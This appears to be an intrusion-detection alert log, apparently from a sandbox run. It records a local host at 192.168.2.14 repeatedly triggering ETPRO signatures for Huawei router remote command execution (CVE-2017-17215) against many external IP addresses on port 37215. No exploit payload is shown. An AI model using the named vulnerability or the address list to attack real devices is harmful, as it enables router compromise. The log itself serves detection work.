                                                    07/10/24-08:27:02.980089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.1441.145.117.121
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090637215192.168.2.14157.131.182.56
                                                    07/10/24-08:26:53.210553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745837215192.168.2.14118.12.132.8
                                                    07/10/24-08:26:49.864771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662037215192.168.2.14162.60.18.54
                                                    07/10/24-08:27:19.266655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194437215192.168.2.1457.18.88.227
                                                    07/10/24-08:26:47.766466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040837215192.168.2.14157.76.86.105
                                                    07/10/24-08:27:27.050359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.1441.178.67.105
                                                    07/10/24-08:27:22.936738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598637215192.168.2.14118.135.44.90
                                                    07/10/24-08:26:36.401393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686037215192.168.2.14140.189.31.129
                                                    07/10/24-08:27:02.949584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754437215192.168.2.14157.55.83.94
                                                    07/10/24-08:27:13.985222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581237215192.168.2.14197.83.207.201
                                                    07/10/24-08:27:33.872945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646237215192.168.2.14157.110.133.42
                                                    07/10/24-08:26:26.597215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899237215192.168.2.1441.39.28.244
                                                    07/10/24-08:27:22.926271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346237215192.168.2.1462.245.25.101
                                                    07/10/24-08:26:28.787394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5762837215192.168.2.14197.61.116.249
                                                    07/10/24-08:27:19.303289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.14197.94.224.81
                                                    07/10/24-08:26:36.417902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910837215192.168.2.1441.232.103.226
                                                    07/10/24-08:26:15.795103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390837215192.168.2.14164.241.129.95
                                                    07/10/24-08:26:43.685142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696437215192.168.2.1488.225.218.83
                                                    07/10/24-08:26:43.895617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993637215192.168.2.1413.25.215.93
                                                    07/10/24-08:27:33.778513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.14157.20.121.141
                                                    07/10/24-08:26:55.470125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5889237215192.168.2.14197.58.59.199
                                                    07/10/24-08:26:34.200878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859037215192.168.2.1441.157.136.151
                                                    07/10/24-08:26:34.234133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917237215192.168.2.14192.240.158.175
                                                    07/10/24-08:26:59.554660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789837215192.168.2.14197.14.89.124
                                                    07/10/24-08:26:18.006056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197237215192.168.2.14119.213.203.102
                                                    07/10/24-08:26:38.624887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635037215192.168.2.1441.251.253.96
                                                    07/10/24-08:27:08.410615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927037215192.168.2.1458.145.162.13
                                                    07/10/24-08:27:10.699441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542837215192.168.2.14157.208.121.7
                                                    07/10/24-08:26:28.922659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813237215192.168.2.14197.18.120.171
                                                    07/10/24-08:26:34.238024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677237215192.168.2.14197.74.252.127
                                                    07/10/24-08:26:57.498447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3685637215192.168.2.14157.15.125.159
                                                    07/10/24-08:26:59.627157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985437215192.168.2.1441.211.132.1
                                                    07/10/24-08:26:20.150804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461837215192.168.2.1414.34.68.118
                                                    07/10/24-08:26:11.557054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105037215192.168.2.14157.27.108.34
                                                    07/10/24-08:26:59.550214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022237215192.168.2.14158.211.16.135
                                                    07/10/24-08:27:03.033407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691637215192.168.2.1441.123.153.116
                                                    07/10/24-08:26:11.537516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771837215192.168.2.14197.207.251.197
                                                    07/10/24-08:26:36.375796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130037215192.168.2.1469.156.250.253
                                                    07/10/24-08:26:43.861688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186437215192.168.2.14197.41.158.175
                                                    07/10/24-08:26:47.994983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659637215192.168.2.14143.68.209.22
                                                    07/10/24-08:27:13.996261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.14157.54.134.185
                                                    07/10/24-08:27:27.147329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013037215192.168.2.14157.121.126.242
                                                    07/10/24-08:26:17.989759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713637215192.168.2.1497.208.116.45
                                                    07/10/24-08:26:41.626550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071837215192.168.2.14157.223.46.248
                                                    07/10/24-08:27:28.138787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948837215192.168.2.14197.191.216.7
                                                    07/10/24-08:27:07.369832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732837215192.168.2.14157.75.52.135
                                                    07/10/24-08:26:22.211996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764637215192.168.2.14157.102.174.50
                                                    07/10/24-08:27:22.929262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498237215192.168.2.14197.158.181.235
                                                    07/10/24-08:27:02.784387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435037215192.168.2.1441.179.229.111
                                                    07/10/24-08:27:24.921580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070637215192.168.2.14197.11.38.150
                                                    07/10/24-08:27:11.528287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943437215192.168.2.1414.136.119.120
                                                    07/10/24-08:27:36.285342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771437215192.168.2.1441.187.31.1
                                                    07/10/24-08:27:23.453421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869237215192.168.2.14157.16.52.236
                                                    07/10/24-08:26:18.028864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544837215192.168.2.1444.167.64.149
                                                    07/10/24-08:26:26.565464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280437215192.168.2.14174.44.79.185
                                                    07/10/24-08:27:17.083690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330437215192.168.2.14191.198.233.86
                                                    07/10/24-08:26:43.833151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688037215192.168.2.14197.163.49.219
                                                    07/10/24-08:26:59.867670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020837215192.168.2.149.79.232.97
                                                    07/10/24-08:26:22.211472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768237215192.168.2.1441.57.182.80
                                                    07/10/24-08:26:34.234133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5712837215192.168.2.142.226.60.8
                                                    07/10/24-08:27:33.845766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292437215192.168.2.1441.32.146.52
                                                    07/10/24-08:26:11.558089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628037215192.168.2.14157.204.246.144
                                                    07/10/24-08:27:17.109836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815637215192.168.2.14197.252.166.193
                                                    07/10/24-08:26:47.877444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601037215192.168.2.1441.50.145.121
                                                    07/10/24-08:26:15.837578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711037215192.168.2.1463.117.197.49
                                                    07/10/24-08:26:55.412388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741837215192.168.2.1441.129.112.147
                                                    07/10/24-08:27:08.318439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805637215192.168.2.14157.193.118.174
                                                    07/10/24-08:26:29.833709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314437215192.168.2.14197.90.142.253
                                                    07/10/24-08:27:02.857576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049237215192.168.2.14157.116.103.27
                                                    07/10/24-08:27:31.526577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635237215192.168.2.14157.56.234.212
                                                    07/10/24-08:26:38.573653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862237215192.168.2.14157.107.230.192
                                                    07/10/24-08:26:57.596939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563637215192.168.2.1441.186.166.74
                                                    07/10/24-08:26:55.278007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059037215192.168.2.14197.68.129.195
                                                    07/10/24-08:27:05.083120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827037215192.168.2.1441.36.34.157
                                                    07/10/24-08:27:24.871233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374837215192.168.2.1441.168.158.147
                                                    07/10/24-08:26:52.021127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500037215192.168.2.14197.17.109.242
                                                    07/10/24-08:27:05.238530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324037215192.168.2.1441.7.97.242
                                                    07/10/24-08:26:22.286064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981237215192.168.2.14197.249.67.218
                                                    07/10/24-08:26:34.243243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571437215192.168.2.1441.125.76.140
                                                    07/10/24-08:27:14.807348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578437215192.168.2.1441.171.73.6
                                                    07/10/24-08:26:41.549796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002637215192.168.2.1482.194.237.189
                                                    07/10/24-08:27:14.858579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735037215192.168.2.1441.5.72.80
                                                    07/10/24-08:27:10.609490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843237215192.168.2.14157.217.104.104
                                                    07/10/24-08:26:18.009286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776237215192.168.2.1431.245.30.141
                                                    07/10/24-08:26:34.208952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752637215192.168.2.14157.237.245.36
                                                    07/10/24-08:26:38.591499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949437215192.168.2.14179.231.235.90
                                                    07/10/24-08:26:57.566526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601437215192.168.2.14157.202.119.185
                                                    07/10/24-08:27:33.758837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553037215192.168.2.1441.179.76.220
                                                    07/10/24-08:26:53.145999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665437215192.168.2.1441.232.149.33
                                                    07/10/24-08:26:11.538222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944437215192.168.2.1438.74.207.61
                                                    07/10/24-08:26:20.175593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869237215192.168.2.14197.56.148.116
                                                    07/10/24-08:26:49.910332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222837215192.168.2.1441.182.241.231
                                                    07/10/24-08:26:59.878182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015437215192.168.2.14157.33.74.242
                                                    07/10/24-08:26:42.383706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531637215192.168.2.1488.234.61.206
                                                    07/10/24-08:26:15.879518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932037215192.168.2.14157.98.235.216
                                                    07/10/24-08:26:48.708629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599037215192.168.2.1441.2.191.23
                                                    07/10/24-08:26:17.959053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965437215192.168.2.14197.170.16.209
                                                    07/10/24-08:26:14.811319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792037215192.168.2.14157.159.174.131
                                                    07/10/24-08:27:05.210866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476237215192.168.2.14157.40.132.62
                                                    07/10/24-08:26:20.176670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5111237215192.168.2.14157.187.169.95
                                                    07/10/24-08:26:49.897778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749437215192.168.2.1441.16.182.126
                                                    07/10/24-08:26:11.198321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730237215192.168.2.14197.158.255.222
                                                    07/10/24-08:26:28.746894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420037215192.168.2.14157.250.148.43
                                                    07/10/24-08:27:22.445688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326437215192.168.2.14197.162.194.76
                                                    07/10/24-08:27:28.144364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261837215192.168.2.14157.87.81.148
                                                    07/10/24-08:26:36.349242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499837215192.168.2.14197.212.103.188
                                                    07/10/24-08:26:11.663157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892037215192.168.2.1441.100.48.34
                                                    07/10/24-08:26:15.868019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037437215192.168.2.14157.119.4.223
                                                    07/10/24-08:26:29.856940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209637215192.168.2.14197.252.133.30
                                                    07/10/24-08:26:43.846786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642437215192.168.2.14157.242.172.178
                                                    07/10/24-08:27:24.871233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963637215192.168.2.1481.181.238.227
                                                    07/10/24-08:27:30.530198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964637215192.168.2.14157.18.107.145
                                                    07/10/24-08:27:05.134098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936637215192.168.2.14197.159.187.182
                                                    07/10/24-08:26:28.876491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896037215192.168.2.14157.127.214.151
                                                    07/10/24-08:27:02.876445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861237215192.168.2.14157.157.33.203
                                                    07/10/24-08:26:45.660252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998837215192.168.2.14197.155.245.204
                                                    07/10/24-08:26:41.482479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937037215192.168.2.14197.159.123.52
                                                    07/10/24-08:26:45.591326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625637215192.168.2.1441.162.243.59
                                                    07/10/24-08:27:07.292595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832437215192.168.2.14157.115.249.14
                                                    07/10/24-08:27:02.853757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134637215192.168.2.1441.81.43.231
                                                    07/10/24-08:27:19.347506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441237215192.168.2.1441.50.91.220
                                                    07/10/24-08:27:23.942698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887837215192.168.2.14197.128.179.35
                                                    07/10/24-08:26:34.217028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661437215192.168.2.14157.99.100.183
                                                    07/10/24-08:27:22.748001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.181.125.84
                                                    07/10/24-08:26:11.469392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359837215192.168.2.14132.170.141.1
                                                    07/10/24-08:26:26.602369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034637215192.168.2.14157.1.8.171
                                                    07/10/24-08:26:38.608581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3665837215192.168.2.14194.184.180.187
                                                    07/10/24-08:27:02.966224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047637215192.168.2.14157.176.204.55
                                                    07/10/24-08:27:19.330211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925837215192.168.2.14157.65.135.131
                                                    07/10/24-08:26:23.350374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079037215192.168.2.14197.163.90.54
                                                    07/10/24-08:26:33.251804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011837215192.168.2.1441.77.34.244
                                                    07/10/24-08:26:38.614472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882637215192.168.2.1441.72.192.239
                                                    07/10/24-08:26:38.624232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435237215192.168.2.1441.157.76.103
                                                    07/10/24-08:27:08.402603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868037215192.168.2.14195.127.13.221
                                                    07/10/24-08:26:43.926715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922637215192.168.2.14197.188.11.65
                                                    07/10/24-08:27:19.329520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420837215192.168.2.14157.118.174.2
                                                    07/10/24-08:27:32.605681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634637215192.168.2.14142.11.170.168
                                                    07/10/24-08:27:03.009632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519837215192.168.2.14114.228.38.239
                                                    07/10/24-08:27:27.058852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554037215192.168.2.14197.6.59.138
                                                    07/10/24-08:26:43.849497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619037215192.168.2.14197.63.176.30
                                                    07/10/24-08:27:20.460517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633237215192.168.2.1441.171.144.71
                                                    07/10/24-08:27:23.817367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505637215192.168.2.14132.178.99.232
                                                    07/10/24-08:26:51.997366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077837215192.168.2.14222.210.16.81
                                                    07/10/24-08:26:49.828950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674237215192.168.2.14197.20.253.96
                                                    07/10/24-08:27:27.142415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016837215192.168.2.1477.109.18.112
                                                    07/10/24-08:26:26.586309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849037215192.168.2.1441.33.236.147
                                                    07/10/24-08:27:07.281440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270437215192.168.2.1487.120.153.188
                                                    07/10/24-08:26:49.830587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492237215192.168.2.141.221.147.100
                                                    07/10/24-08:26:51.990112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822637215192.168.2.1441.134.200.20
                                                    07/10/24-08:27:31.461924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199837215192.168.2.1441.89.218.142
                                                    07/10/24-08:26:11.133869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4281837215192.168.2.14157.160.52.78
                                                    07/10/24-08:27:11.531536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966437215192.168.2.14157.165.46.1
                                                    07/10/24-08:27:28.070223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962037215192.168.2.14197.224.98.203
                                                    07/10/24-08:26:48.012833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160637215192.168.2.1441.8.180.240
                                                    07/10/24-08:27:13.911358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610037215192.168.2.1441.65.236.250
                                                    07/10/24-08:26:43.574269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892437215192.168.2.1441.51.81.196
                                                    07/10/24-08:26:36.420530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848037215192.168.2.1414.115.12.131
                                                    07/10/24-08:26:55.278007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621437215192.168.2.1441.103.126.26
                                                    07/10/24-08:27:13.986836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589237215192.168.2.14157.168.198.221
                                                    07/10/24-08:27:17.056962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5144037215192.168.2.1469.98.37.105
                                                    07/10/24-08:27:19.191289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866037215192.168.2.14157.87.149.87
                                                    07/10/24-08:26:33.161010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3832437215192.168.2.1441.141.190.204
                                                    07/10/24-08:26:13.851676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523237215192.168.2.14197.158.161.33
                                                    07/10/24-08:26:36.389134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534837215192.168.2.14157.130.157.225
                                                    07/10/24-08:26:11.619310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707437215192.168.2.14205.116.213.167
                                                    07/10/24-08:27:02.702659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219037215192.168.2.1423.236.187.217
                                                    07/10/24-08:27:10.591175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336437215192.168.2.14197.58.66.199
                                                    07/10/24-08:26:20.143169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950637215192.168.2.1441.60.38.25
                                                    07/10/24-08:26:59.553454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585837215192.168.2.14157.137.115.12
                                                    07/10/24-08:27:24.976551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328037215192.168.2.14197.214.125.103
                                                    07/10/24-08:27:28.120575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825837215192.168.2.1441.46.206.139
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586237215192.168.2.14197.21.122.114
                                                    07/10/24-08:26:43.726250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754037215192.168.2.14157.206.247.14
                                                    07/10/24-08:26:20.158539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604637215192.168.2.14157.121.123.225
                                                    07/10/24-08:27:05.153820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948237215192.168.2.14157.166.97.53
                                                    07/10/24-08:27:33.850737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702637215192.168.2.14157.108.172.132
                                                    07/10/24-08:27:27.136540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707837215192.168.2.14197.230.152.241
                                                    07/10/24-08:27:27.155928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579837215192.168.2.1441.63.196.227
                                                    07/10/24-08:27:11.557326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913237215192.168.2.14157.118.158.160
                                                    07/10/24-08:26:28.859810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552037215192.168.2.1496.25.212.247
                                                    07/10/24-08:27:11.479148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947637215192.168.2.1441.148.254.56
                                                    07/10/24-08:26:41.372356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587837215192.168.2.14157.94.161.124
                                                    07/10/24-08:26:17.986594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809237215192.168.2.14197.202.8.121
                                                    07/10/24-08:26:59.881196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618837215192.168.2.14157.95.155.169
                                                    07/10/24-08:26:41.547528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583637215192.168.2.1480.109.10.54
